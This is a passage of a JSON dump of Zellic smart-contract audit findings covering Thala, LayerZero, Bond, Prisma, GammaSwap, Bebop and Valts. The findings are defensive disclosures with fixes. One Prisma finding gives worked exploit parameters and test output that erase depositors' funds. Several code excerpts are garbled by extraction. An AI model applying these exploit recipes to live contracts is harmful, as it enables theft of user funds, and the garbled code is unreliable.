Prices should be properly set. ensures get_store().numerator == numerator; ensures get_store().denominator == denominator; } spec price_of { /// Should abort if and only if the resource does not exist. aborts_if !has_store(); /// Returned prices should reflect stored values. ensures result_1 == get_store().numerator; ensures result_2 == get_store().denominator; }", "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" }, { "title": "4.3 thala_protocol_v1::params
Zellic Thala Lab", + "labels": [ + "Zellic" + ], + "body": "4.3 thala_protocol_v1:)params This module is similar to thala_protocol_v1:)oracle. Here is what one of the function specifications looks like: spec set_params { ///)) Only be called by @thala_protocol_v1 can set params. aborts_if signer:)address_of(manager) !) @thala_protocol_v1; ///)) Param store should be created if it did not exist. ensures has_store(); ///)) Parameters should be properly set. ensures get_store().mcr_numerator =) mcr_numerator; ensures get_store().mcr_denominator =) mcr_denominator; ensures get_store().redeem_fee_numerator =) redeem_fee_numerator; ensures get_store().redeem_fee_denominator =) redeem_fee_denominator; } The others are also closely analogous to those in the oracle module. Zellic Thala Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Thala Labs Move Dollar - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The sendOFT function call can be blocked", + "labels": [ + "Zellic" + ], + "body": "Target: OFTWrapper Category: Coding Mistakes Likelihood: Low Severity: Low : Low The contract owner can set any bps value of the variables defaultBps and the oftBps [_oft] in the range from 0 to the maximum BPS_DENOMINATOR inclusive. But during the sendOFT function call, the getAmountAndFees function will check that the final bps value is less than BPS_DENOMINATOR and revert the transaction if it equals or more. function getAmountAndFees( address _oft, uint256 _amount, uint256 _callerBps ) public view override returns ( uint256 amount, uint256 wrapperFee, uint256 callerFee ) { uint256 wrapperBps; if (oftBps[_oft] == MAX_UINT) { wrapperBps = 0; } else if (oftBps[_oft] > 0) { wrapperBps = oftBps[_oft]; } else { wrapperBps = defaultBps; } require(wrapperBps + _callerBps < BPS_DENOMINATOR, \u201cOFTWrapper: Fee bps exceeds 100%\u201d); Zellic LayerZero ...)) } In case if the contract owner sets the defaultBps to the maximum BPS_DENOMINATOR value, the sendOFT function call will be blocked for all unassigned _oft addresses. \ufffflso if the maximum oftBps value is set for a specific _oft address, the sendOFT function call with this _oft address will be reverted. Set a limit for the defaultBps and oftBps[_oft] values strictly less than the BPS_DENOM INATOR value. This issue was fixed by LayerZero in commit f11289a5. Zellic LayerZero 4 Audit Results At the time of our audit, the code was not deployed to mainnet evm. During our audit, we discovered 1 low risk findings. LayerZero acknowledged this finding and implemented fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero OFT Wrapper Audit (January 19th 2023) - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The bond expiry_ can be in the past", + "labels": [ + "Zellic" + ], + "body": "Target: BondFixedTermTeller, BondFixedExpiryTeller Category: Business Logic Likelihood: Medium Severity: Medium : Medium There are two functions, namely create() and deploy(), available in both the FixedT erm and FixedExpiry tellers, which do not check whether the expiry_ has passed the current block.timestamp or not. In the case of the deploy function, this implies that a bond token can be created for a past block.timestamp, which could jeopardize the concept of bond tokens and their expiry. function deploy(ERC20 underlying_, uint48 expiry_) external override nonReentrant returns (uint256) { uint256 tokenId = getTokenId(underlying_, expiry_); /) @audit make sure that expiry_ is in the future. 
/) Only creates token if it does not exist if (!tokenMetadata[tokenId].active) { _deploy(tokenId, underlying_, expiry_); } return tokenId; } For the create function, however, it implies that bondTokens would be issue for an already vested bond position. In both of the aformentioned cases, having the expiry_ in the past could potentially lead to bad user experience as well as undesired results in terms of bond issuance and redemption. We recommend implementing checks that would block the issuance or deployment of bondTokens that have an expiry in the past. Zellic Bond Labs require(expiry_ > block.timestamp, \u201cerror: expiry is in the past\u201d); Bond Labs acknowledged this finding and implemented a fix in commits 4eb523da and 453d02e0. Zellic Bond Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Bond Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Array indexes may be out of bounds", + "labels": [ + "Zellic" + ], + "body": "Target: BondFixedTermTeller Category: Business Logic Likelihood: Informational Severity: Informational : Informational In the batchRedeem function, two arrays are passed as parameters to the function. The two arrays, tokenIds and amounts_, are then accessed in one for loop for the same indices, without prior checking that their lengths are equal. function batchRedeem(uint256[] calldata tokenIds_, uint256[] calldata amounts_) external override nonReentrant { uint256 len = tokenIds_.length; /) @audit make sure that ther lengths are equal for (uint256 i; i < len; +)i) { _redeem(tokenIds_[i], amounts_[i]); } } Should there be a scenario when the lengths mismatch, the out-of-bounds error would trigger the function call to revert altogether at the last index, thus wasting the gas used for the transaction. We recommend implementing a check such that the length of the arrays is properly checked before the for loop. require(tokenIds.length =) amounts_.length, \u201carrays' lengths mismatch\u201d); Bond Labs acknowledged this finding and implemented a fix in commit 436d18ec. Zellic Bond Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Bond Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Removal from callbackAuthorized is not conclusive", + "labels": [ + "Zellic" + ], + "body": "Target: BondBaseSDA Category: Business Logic Likelihood: Medium Severity: Medium : Medium The callbackAuthorized mapping dictates which msg.sender is allowed to perform ca llbacks on a specific market, and it is set via the setCallbackAuthStatus function. The status of this authorization is only checked when the market is created, despite the fact that the msg.sender can lose their rights to perform callbacks in the meanwhile, should the owner decide so. Currently, there are no checks whatsoever, in any of the accompanying contracts, for whether the msg.sender is allowed to perform callbacks on a market. 
function _createMarket(MarketParams memory params_) internal returns (uint256) { { /) Check that the auctioneer is allowing new markets to be created if (!allowNewMarkets) revert Auctioneer_NewMarketsNotAllowed(); /) Ensure params are in bounds uint8 payoutTokenDecimals = params_.payoutToken.decimals(); uint8 quoteTokenDecimals = params_.quoteToken.decimals(); if (payoutTokenDecimals < 6 |) payoutTokenDecimals > 18) revert Auctioneer_InvalidParams(); if (quoteTokenDecimals < 6 |) quoteTokenDecimals > 18) revert Auctioneer_InvalidParams(); if (params_.scaleAdjustment < -24 |) params_.scaleAdjustment > 24) revert Auctioneer_InvalidParams(); /) Restrict the use of a callback address unless allowed if (!callbackAuthorized[msg.sender] &) params_.callbackAddr !) address(0)) revert Auctioneer_NotAuthorized(); } /) ...)) } Zellic Bond Labs Allowing previously whitelisted msg.sender to perform callbacks may result in unde- sired actions on behalf of the market it previously represented, potentially leading to financial losses. We recommend assuring that once a user has been unwhitelisted, they can no longer perform actions on behalf of the market they originally represented. Bond Labs acknowledged this finding and implemented a fix in commit 00ddf327. Zellic Bond Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Bond Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Data desynchronization", + "labels": [ + "Zellic" + ], + "body": "Target: BondBaseCallback, BondBaseTeller Category: Business Logic Likelihood: Low Severity: Low : Low When creating a market, the user can set the address of the callback contract that will process transfers of the owner\u2019s tokens. To do this, the user should be whitelisted, but deploying the callback contract is not under control by project contract. Therefore, it is not guaranteed that the user will specify the same address of _aggregator contract as the BondBaseTeller contract. As a result, there may be a desynchronization of the market data used to process the token transfer. As a result of a user error, the market may be unusable since it is impossible to edit the corresponding market settings after creation. For the expected operation of the BondBaseCallback contract independent of user actions, we recommend directly passing the payoutToken and quoteToken token ad- dresses to the callback function. Bond Labs acknowledged this finding and implemented a fix in commit 252f64d8. Zellic Bond Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Bond Protocol - Zellic Audit Report.pdf" + }, + { + "title": "3.1 High-fraction liquidations can cause the product P to be- come 0", + "labels": [ + "Zellic" + ], + "body": "Target: StabilityPool Category: Business Logic Likelihood: High Severity: Critical : Critical During liquidations, each depositor is rewarded with the collateral and some amount of DebtTokens are burned from their deposits. As it would be impossible to update each user\u2019s balance during liquidation, the protocol uses a global running product P and sum S to derive the compounded DebtToken deposit and corresponding collateral gain as a function of the initial deposit. Refer to the Appendix 7.1 for a list of terms and the derivation of P. Continuous high-fraction liquidations can cause the value of the global-running prod- uct P to become 0, leading to potential disruptions in withdrawals and reward claims from the stability pool. 
The function _updateRewardSumAndProduct is responsible for updating the value of P when it falls below 1e9 by multiplying it by 1e9. However, certain liquidation scenarios can update P in a way that multiplying it by 1e9 is insufficient to bring its value above 1e9. Refer to the Appendix 7.2 for the exploit of the vulnerability. Following is the output of the exploit: Running 1 test for test/Exploit.t.sol:Exploit [PASS] testPto0Exploit() (gas: 2053310) Logs: Value of P after first liquidation 1000000000 Value of P after second liquidation 2 Value of P after third liquidation 0 Alice's deposits in stability pool before the withdrawal Alice's balance of debttoken before the withdrawal Zellic Prisma Finance Alice's deposits in stability pool after the withdrawal 0 Alice's balance of debttoken after the withdrawal Alice's deposits are now erased from the pool without being returned First thing to note is that if newProductFactor is 1, then multiplying by 1e9 is not enough to bring P back to the correct scale. The value of newProductFactor can be set to 1 by making _debtLossPerUnitStaked equal to 1e18 - 1. This requires calculating the _debtToOffset value to pass to the offset function such that _debtLossPerUnitStaked is 1e18 - 1. The calculations for this are as follows: _debtLossPerUnitStaked = ( _debtToOffset * 1e18 / _totalDebtTokenDeposits ) + 1 1e18 - 1 = ( _debtToOffset * 1e18 / _totalDebtTokenDeposits ) + 1 /) (We need _debtLossPerUnitStaked to be 1e18 - 1) 1e18 - 2 = ( _debtToOffset * 1e18 / _totalDebtTokenDeposits ) Fixing _totalDebtTokenDeposits to 10000 * 1e18 _debtToOffset = 10000e18 * (1e18 - 2) / 1e18 _debtToOffset = 9999999999999999980000 Performing a liquidation with _debtToOffset as 9999999999999999980000 can bring newP from 1e18 to 1e9 in one liquidation, assuming currentP is 1e18, due to the calculation in _updateRewardSumAndProduct: newP = (currentP * newProductFactor * 1e9) / 1e18; (we already know newProductFactor is 1 ) Now, by creating three troves with the required debt amount, each having _debtToOff set as 9999999999999999980000, and subsequently liquidating them while maintaining the deposits in the stability pool at exactly 10,000 * 1e18, P becomes 0. Consequently, users may face difficulties withdrawing from the stability pool. As _debtToOffset is the compositeDebt of the trove (the requested debt amount + debt borrowing fee + debt gas comp), we need to solve the following equation to calculate the _debtAmount needed to open such trove: x + (x * 5000000000000000 / (1e18) ) + (200 * (1e18)) = 9999999999999999980000 Zellic Prisma Finance Here x comes out to be x = 9751243781094527343284. Using this _debtAmount, an attacker may open three troves, and when the ICR < MCR, they can liquidate the troves while maintaining the deposits in the SP to be exactly 10,000 * 1e18. After three liquidations, the value of P becomes 0. Due to this, the function getCompoundedDebtDeposit will return 0 for all the depositors, and thus users would not be able to make any withdrawals from the stability pool. Withdrawals and claimable rewards for any new deposits will fail as P_Snapshot stored for these deposits would be 0. Add an assertion as shown below in _updateRewardSumAndProduct so that such high- fraction liquidations would be reverted. assert(newP > 0); P = newP; emit P_Updated(newP); This issue has been acknowledged by Prisma Finance, and a fix was implemented in commit ecc58eb7. 
Zellic Prisma Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Prisma Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Incorrect return value in claimableRewardAfterBoost", + "labels": [ + "Zellic" + ], + "body": "Target: PrismaTreasury Category: Coding Mistakes Likelihood: Medium Severity: Informational : Informational There are two issues in the return value of the function claimableRewardAfterBoost: function claimableRewardAfterBoost( address account, address boostDelegate, IRewards rewardContract ) external view returns (uint256 adjustedAmount, uint256 feeToDelegate) { uint256 amount = rewardContract.claimableReward(account); uint256 week = getWeek(); uint256 totalWeekly = weeklyEmissions[week]; address claimant = boostDelegate =) address(0) ? account : boostDelegate; uint256 previousAmount = accountWeeklyEarned[claimant][week]; uint256 fee; if (boostDelegate !) address(0)) { Delegation memory data = boostDelegation[boostDelegate]; if (!data.isEnabled) return (0, 0); fee = data.feePct; if (fee =) type(uint16).max) { try data.callback.getFeePct(claimant, amount, previousAmount, totalWeekly) returns (uint256) {} catch { return (0, 0); } } if (fee >) 10000) return (0, 0); } adjustedAmount = boostCalculator.getBoostedAmount(claimant, amount, previousAmount, totalWeekly); fee = (adjustedAmount * fee) / 10000; return (adjustedAmount, fee); } Zellic Prisma Finance 1. According to the comments of the claimableRewardAfterBoost function, the re- turned value adjustedAmount is the amount received after boost and delegate fees. But fee is not deducted from the adjustedAmount before this value is re- turned. 2. As a fee equaling 10,000 is acceptable by the contract, the function should not return (0,0) when the fee is equal to 10,000. Incorrect values will be reported to the users. Consider implementing the following changes. if (fee >) 10000) return (0, 0); if (fee > 10000) return (0, 0); } adjustedAmount = boostCalculator.getBoostedAmount(claimant, amount, previousAmount, totalWeekly); fee = (adjustedAmount * fee) / 10000; adjustedAmount -= fee; return (adjustedAmount, fee); This issue has been acknowledged by Prisma Finance, and a fix was implemented in commits fb6391a8 and ca3bcf51. Zellic Prisma Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Prisma Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Unhandled return value of collateral transfer", + "labels": [ + "Zellic" + ], + "body": "Target: TroveManager, StabilityPool, BorrowerOperations Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational Certain tokens, such as USDT, do not correctly implement the EIP-20 standard. Their t ransfer and transferFrom functions return void instead of a successful boolean. Con- sequently, calling these functions with the expected EIP-20 function signatures will always result in a revert. The documentation states that only the listed collateral tokens are supported. How- ever, if the protocol were to later support these nonstandard tokens, it could lead to issues with certain function calls that rely on transfer/transferFrom returning a boolean value. Nonstandard collateral tokens might not work as intended. Consider using OpenZeppelin\u2019s safeTransferFrom()/safeTransfer() method instead of transferFrom()/transfer(). This will ensure that the transfers are handled safely and prevent any unexpected reverts related to nonstandard tokens. 
This issue has been acknowledged by Prisma Finance, and a fix was implemented in commit 039cc86a. Zellic Prisma Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Prisma Finance - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: ExternalLiquidationStrategy.sol Function: _liquidateExternally(uint256 tokenId, uint128[] amounts, uint 256 lpTokens, address to, byte[] data) Allows any caller to liquidate the existing loan using a flash loan of collateral tokens from the pool and/or CFMM LP tokens. Before the liquidation, the externalSwap func- tion will be called. After that, a check will be made that enough tokens have been deposited. Allows only full liquidation of the loan. Inputs", + "labels": [ + "Zellic" + ], + "body": "tokenId \u2013 Validation: There is no verification that the corresponding _loan for this tokenId exists. \u2013 : A tokenId referring to an existing _loan. Not necessary msg.sender is owner of _loan, so the caller can choose any existing loan. amounts \u2013 Validation: There is a check that amount <= s.TOKEN_BALANCE inside externa lSwap->sendAndCalcCollateralLPTokens->sendToken function. \u2013 : Amount of tokens from the pool to flash loan. lpTokens \u2013 Validation: There is a check that lpTokens <= s.LP_TOKEN_BALANCE inside ex ternalSwap->sendCFMMLPTokens->sendToken function \u2013 : Amount of CFMM LP tokens being flash loaned. to \u2013 Validation: Cannot be zero address. \u2013 : Address that will receive the collateral tokens and/or lpTokens in flash loan. Zellic GammaSwap data \u2013 Validation: No checks. \u2013 : Custom user data. It is passed to the externalCall. Branches and code coverage (including function calls) The part of _liquidateExternally tests are skipped. Intended branches \u25a1 Check that loan was fully liquidated Negative behavior 4\u25a1 _loan for tokenId does not exist. \u25a1 Balance of contract not enough to transfer amounts. \u25a1 Balance of contract not enough to transfer lpTokens. \u25a1 Zero to address. 4\u25a1 After externalCall the s.cfmm balance of contract has not returned to the pre- vious value. \u25a1 After externalCall the balance of contract for each tokens has not returned to the previous value. Function call analysis externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendAndCalcCo llateralLPTokens(to, amounts, lastCFMMTotalSupply) -> sendToken(IERC20(to kens[i]), to, amounts[i], s.TOKEN_BALANCE[i], type(uint128).max) -> Gamma SwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s.TO KEN_BALANCE[i], but they must return the same or a larger amount after the externalCall function call; it will be checked inside the updateCollateral function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendCFMMLPTok ens(_cfmm, to, lpTokens) -> sendToken(IERC20(_cfmm), to, lpTokens, s.LP_T OKEN_BALANCE, type(uint256).max) -> GammaSwapLibrary.safeTransfer(token, t o, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s. LP_TOKEN_BALANCE, but they must return the same or a larger amount after Zellic GammaSwap the externalCall function call; it will be checked inside the payLoanAndRef undLiquidator function. 
externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> IExternalCall ee(to).externalCall(msg.sender, amounts, lpTokens, data); \u2013 External/Internal? External. \u2013 Argument control? msg.sender, amounts, lpTokens, and data. \u2013 : The reentrancy is not possible because the other important exter- nal functions have lock. If caller does not return enough amount of tokens, the transaction will be reverted. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> updateCollate ral(_loan) -> GammaSwapLibrary.balanceOf(IERC20(tokens[i]), address(this) ); -> address(_token).staticcall(abi.encodeWithSelector(_token.balanceOf. selector, _address)) \u2013 : Return the current token balance of this contract. This balance will be compared with the last tokenBalance[i] value; if the balance was in- creased, the _loan.tokensHeld and s.TOKEN_BALANCE will be increased too. But if the balance was decreased, the withdrawn value will be checked that it is no more than tokensHeld[i] (available collateral) and the _loan.t okensHeld and s.TOKEN_BALANCE will be increased. payLoanAndRefundLiquidator(tokenId, tokensHeld, loanLiquidity, 0, true) - > GammaSwapLibrary.safeTransfer(IERC20(s.cfmm), msg.sender, lpRefund); \u2013 External/Internal? External. \u2013 Argument control? No. \u2013 : The user should not control the lpRefund value. Transfer the re- maining part of CFMMLPTokens.", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: ExternalLongStrategy.sol Function: _rebalanceExternally(uint256 tokenId, uint128[] amounts, uint 256 lpTokens, address to, byte[] data) Allows the loan\u2019s creator to use a flash loan and also rebalance a loan\u2019s collateral. Inputs", + "labels": [ + "Zellic" + ], + "body": "tokenId \u2013 Validation: There is a check inside the _getLoan function that msg.sender is creator of loan. \u2013 : A tokenId refers to an existing _loan, which will be rebalancing. amounts Zellic GammaSwap \u2013 Validation: There is a check that amount <= s.TOKEN_BALANCE inside externa lSwap->sendAndCalcCollateralLPTokens->sendToken function. \u2013 : Amount of tokens from the pool to flash loan. lpTokens \u2013 Validation: There is a check that lpTokens <= s.LP_TOKEN_BALANCE inside ex ternalSwap->sendCFMMLPTokens->sendToken function. \u2013 : Amount of CFMM LP tokens being flash loaned. to \u2013 Validation: Cannot be zero address. \u2013 : Address that will receive the collateral tokens and/or lpTokens in flash loan. data \u2013 Validation: No checks. \u2013 : Custom user data. It is passed to the externalCall. Branches and code coverage (including function calls) Intended branches 4\u25a1 lpTokens !) 0. \u25a1 amounts is not empty. 4\u25a1 amounts is not empty and lpTokens !) 0. 4\u25a1 Withdraw one of the tokens by no more than the available number of tokens. 4\u25a1 Withdraw both tokens by no more than the available number of tokens. 4\u25a1 Deposit one of the tokens. 4\u25a1 Deposit both tokens. 4\u25a1 Deposit one token and withdraw another. Negative behavior 4\u25a1 _loan for tokenId does not exist. \u25a1 msg.sender is not creator of the _loan. \u25a1 Balance of contract is not enough to transfer amounts. \u25a1 Balance of contract is not enough to transfer lpTokens. \u25a1 Zero to address. \u25a1 After externalCall, the s.cfmm balance of the contract has not returned to the previous value. 
\u25a1 After externalCall, the balance of the contract for each tokens has not returned to the previous value. \u25a1 After externalCall, the balance of the contract for one of tokens has not re- turned to the previous value. Zellic GammaSwap 4\u25a1 Withdraw one of the tokens, and loan is undercollateralized after externalCall. 4\u25a1 Withdraw both tokens, and loan is undercollateralized after externalCall. 4\u25a1 Withdraw one of the tokens and deposit another, and loan is undercollateralized after externalCall. \u25a1 The amounts and tokenId are zero. Function call analysis externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendAndCalcCo llateralLPTokens(to, amounts, lastCFMMTotalSupply) -> sendToken(IERC20(to kens[i]), to, amounts[i], s.TOKEN_BALANCE[i], type(uint128).max) -> Gamma SwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s.TO KEN_BALANCE[i], but they must return the same or a larger amount after the externalCall function call; it will be checked inside the updateCollateral function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendCFMMLPTok ens(_cfmm, to, lpTokens) -> sendToken(IERC20(_cfmm), to, lpTokens, s.LP_T OKEN_BALANCE, type(uint256).max) -> GammaSwapLibrary.safeTransfer(token, t o, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s. LP_TOKEN_BALANCE, but they must return the same or a larger amount after the externalCall function call; it will be checked inside the checkLPTokens function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> IExternalCall ee(to).externalCall(msg.sender, amounts, lpTokens, data); \u2013 External/Internal? External. \u2013 Argument control? msg.sender, amounts, lpTokens, and data. \u2013 : The reentrancy is not possible because the other important exter- nal functions have lock. If caller does not return enough amount of tokens, the transaction will be reverted. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> updateCollate ral(_loan) -> GammaSwapLibrary.balanceOf(IERC20(tokens[i]), address(this) ); -> address(_token).staticcall(abi.encodeWithSelector(_token.balanceOf. selector, _address)) \u2013 External/Internal? External. Zellic GammaSwap \u2013 Argument control? No. \u2013 : Return the current token balance of this contract. This balance will be compared with the last tokenBalance[i] value; if the balance was in- creased, the _loan.tokensHeld and s.TOKEN_BALANCE will be increased too. But if the balance was decreased, the withdrawn value will be checked that it is no more than tokensHeld[i] (available collateral) and the _loan.t okensHeld and s.TOKEN_BALANCE will be increased. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> checkLPTokens (_cfmm, prevLpTokenBalance, lastCFMMInvariant, lastCFMMTotalSupply) -> Ga mmaSwapLibrary.balanceOf(IERC20(_cfmm), address(this)) \u2013 External/Internal? External. \u2013 Argument control? No. \u2013 : Return the current _cfmm balance of this contract. This new balance will be compared with the balance before the externalCall function call, and if new value is less, the transaction will be reverted. Also, update the s.LP_TOKEN_BALANCE and s.LP_INVARIANT. Zellic GammaSwap 5 Audit Results At the time of our audit, the code was not deployed to mainnet EVM. 
During our audit, we discovered one finding that was informational in nature. GammaSwap acknowledged the finding and implemented a fix.", "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap - Zellic Audit Report.pdf" }, { "title": "3.1 Arbitrary trade forgery", "labels": [ "Zellic" ], "body": "Target: bebop_aggregation_contract Category: Business Logic Likelihood: High Severity: Critical : Critical A malicious user can forge an arbitrary trade including any trader. function validateMakerSignature( address maker_address, bytes32 hash, Signature memory signature ) public view override { ... } else if (signature.signatureType == SignatureType.EIP1271) { require(IERC1271(signature.walletAddress).isValidSignature(hash, signature.signatureBytes) == EIP1271_MAGICVALUE, \u201cInvalid Maker EIP 1271 Signature\u201d); ... } This is caused by the user-supplied maker signatures, which can be set to EIP1271 signatures, verified against a user-supplied wallet address that has to return a valid value. However, there is nothing that binds the maker addresses to the wallet addresses. As a result, a user can supply an arbitrary maker address and a wallet address that will always return the correct value to pass signature checks. A malicious user can forge extremely unbalanced one-sided trades to steal funds from any user (market maker or taker) that has approval to the Bebop contract. Bind the wallet address to the maker address or use the maker address as the wallet address. The issue has been fixed in commit ce63364f. Zellic Bebop", "html_url": "https://github.com/Zellic/publications/blob/master/Bebop - Zellic Audit Report.pdf" }, { "title": "3.2 Any order can be blocked permanently", "labels": [ "Zellic" ], "body": "Target: bebop_aggregation_contract Category: Business Logic Likelihood: Medium Severity: Medium : Medium // Construct partial orders from aggregated orders function assertAndInvalidateAggregateOrder( AggregateOrder memory order, bytes memory takerSig, Signature[] memory makerSigs ) public override returns (bytes32) { The public function assertAndInvalidateAggregateOrder checks the validity of an order, but in doing so it also sets the nonce of that order. This function should be called by SettleAggregateOrder, after which the trade is executed. If called alone, it will set the nonce of that specific trade, and as a result, that order cannot be used since the nonce will be set. A user can block any person\u2019s call to SettleAggregateOrder by calling assertAndInvalidateAggregateOrder first. Change the visibility of assertAndInvalidateAggregateOrder to internal. The issue has been fixed in commit fa724361. Zellic Bebop", "html_url": "https://github.com/Zellic/publications/blob/master/Bebop - Zellic Audit Report.pdf" }, { "title": "3.3 A nonce of 0 can result in signature replay attacks", "labels": [ "Zellic" ], "body": "Target: bebop_aggregation_contract Category: Business Logic Likelihood: Low Severity: Low : Low The function invalidateOrder is responsible for checking and setting nonces in a gas-efficient manner; it does so by checking a certain slot, and if the slot is not 0, the nonce has been used.
function invalidateOrder(address maker, uint256 nonce) private { uint256 invalidatorSlot = uint64(nonce) >> 8; uint256 invalidatorBit = 1 << uint8(nonce); mapping(uint256 => uint256) storage invalidatorStorage = maker_validator[maker]; uint256 invalidator = invalidatorStorage[invalidatorSlot]; require(invalidator & invalidatorBit == 0, \u201cInvalid maker order (nonce)\u201d); invalidatorStorage[invalidatorSlot] = invalidator | invalidatorBit; } However, the specific nonce 0 will always pass this check. If the nonce 0 was chosen as the nonce to use, signature replay attacks could be possible, causing loss of funds for either a market maker or taker. Enforce that the nonce supplied is never 0. The issue has been fixed in commit e4aa345b. Zellic Bebop", "html_url": "https://github.com/Zellic/publications/blob/master/Bebop - Zellic Audit Report.pdf" }, { "title": "3.4 The signature may be too short", "labels": [ "Zellic" ], "body": "Target: bebop_aggregation_contract Category: Coding Mistakes Likelihood: Low Severity: Low : Low There are no checks on the signature length in the getRsv function. This function is responsible for extracting the r/s/v values from a signature. The function is defined as follows: function getRsv(bytes memory sig) internal pure returns (bytes32, bytes32, uint8) { bytes32 r; bytes32 s; uint8 v; assembly { r := mload(add(sig, 32)) s := mload(add(sig, 64)) v := and(mload(add(sig, 65)), 255) } if (v < 27) v += 27; return (r, s, v); } In case the signature is shorter than 65 bytes, the r/s will be padded with zeroes, which could lead to undesired behavior. The impact of this issue is low, as the function is only used to extract the r/s/v values from a signature. The function is not used to verify the signature itself, which is done by the ecrecover function. We recommend adding a check that ensures the signature is 65 bytes long. function getRsv(bytes memory sig) internal pure returns (bytes32, bytes32, uint8) { require(sig.length >= 65, \u201cSignature too short\u201d); bytes32 r; bytes32 s; uint8 v; assembly { r := mload(add(sig, 32)) s := mload(add(sig, 64)) v := and(mload(add(sig, 65)), 255) } if (v < 27) v += 27; return (r, s, v); } The issue has been fixed in commit ba4a5804. Zellic Bebop", "html_url": "https://github.com/Zellic/publications/blob/master/Bebop - Zellic Audit Report.pdf" }, { "title": "3.1 Unnecessary use of the receive() function", "labels": [ "Zellic" ], "body": "Target: valts.sol Category: Coding Mistakes Likelihood: Low Severity: Low : Low The receive() function is typically used when the contract is supposed to receive ETH. In this case, the contract is expected not to receive any ETH, and for that reason, a revert is put in place so that it does not happen. receive() external payable { revert(); } We recommend removing the receive() function altogether, such that no ETH can be manually transferred by an EOA to the contract. The issue has been fixed in commit 2124d1a. Zellic Valts", "html_url": "https://github.com/Zellic/publications/blob/master/Valts - Zellic Audit Report.pdf" }, { "title": "3.2 Inconsistent usage of modifiers", "labels": [ "Zellic" ], "body": "Target: valts.sol, Valts1155.sol Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A In wipeApproval, the onlyRole(OWNER_ROLE) modifier can be used instead of the current require statement.
function wipeApproval(ApprovalType approvalType, address to, uint256 amount) external { require(hasRole(OWNER_ROLE, msg.sender), \u201cOwner required\u201d); cleanupApproval(makeKey(approvalType, to, amount)); } We recommend using the onlyRole modifier. function wipeApproval(ApprovalType approvalType, address to, uint256 amount) external onlyRole(OWNER_ROLE) { cleanupApproval(makeKey(approvalType, to, amount)); } The issue has been fixed in commits 8bbb42b and 2124d1a. Zellic Valts", "html_url": "https://github.com/Zellic/publications/blob/master/Valts - Zellic Audit Report.pdf" }, { "title": "3.3 Role checks are redundant", "labels": [ "Zellic" ], "body": "Target: Valts1155.sol Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A In remminter and addminter, there is a check on whether the account whose role is about to be changed actually has that role or not. The check does not need to be performed at the function level, since _revokeRole and _grantRole perform the necessary checks and reverts in the case those fail. function remminter(address account) external onlyRole(OWNER_ROLE) { require(hasRole(MINTER_ROLE, account), \u201cNot a minter\u201d); _revokeRole(MINTER_ROLE, account); } function addminter(address account) external onlyRole(OWNER_ROLE) { require(!hasRole(MINTER_ROLE, account), \u201cAlready a minter\u201d); _grantRole(MINTER_ROLE, account); } We recommend removing the require statements. function remminter(address account) external onlyRole(OWNER_ROLE) { _revokeRole(MINTER_ROLE, account); } function addminter(address account) external onlyRole(OWNER_ROLE) { _grantRole(MINTER_ROLE, account); } The issue has been fixed in commit 8bbb42b. Zellic Valts", "html_url": "https://github.com/Zellic/publications/blob/master/Valts - Zellic Audit Report.pdf" }, { "title": "4.1 Zero confirmations lead to arbitrary payload execution", "labels": [ "Zellic" ], "body": "Target: ReceiveUlnBase Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The OApp can configure requiredConfirmations to 0 on the receiving side to allow quicker message delivery. This should be okay as long as the OApp understands the risk of 0-confirmation transactions. function _verified( address _dvn, bytes32 _headerHash, bytes32 _payloadHash, uint64 _requiredConfirmation ) internal returns (bool verified) { uint64 confirmations = hashLookup[_headerHash][_payloadHash][_dvn]; // return true if the dvn has signed enough confirmations verified = confirmations >= _requiredConfirmation; delete hashLookup[_headerHash][_payloadHash][_dvn]; } There exists an edge case in _verified where the confirmations default to 0 on an empty slot, so verified is always true. This would allow complete forgery of messages, as every message would be considered valid. We would recommend storing a flag along with confirmations in hashLookup. This would prevent the default value of 0 from being considered a valid number of confirmations. This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 32981204.
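To make the recommended fix for finding 4.1 concrete, the sketch below pairs the confirmation count with an explicit submission flag so that an empty slot can never satisfy a zero-confirmation requirement. This is a minimal illustration under assumed names (the Verification struct and its fields are not part of the audited code), not the actual patch:

```solidity
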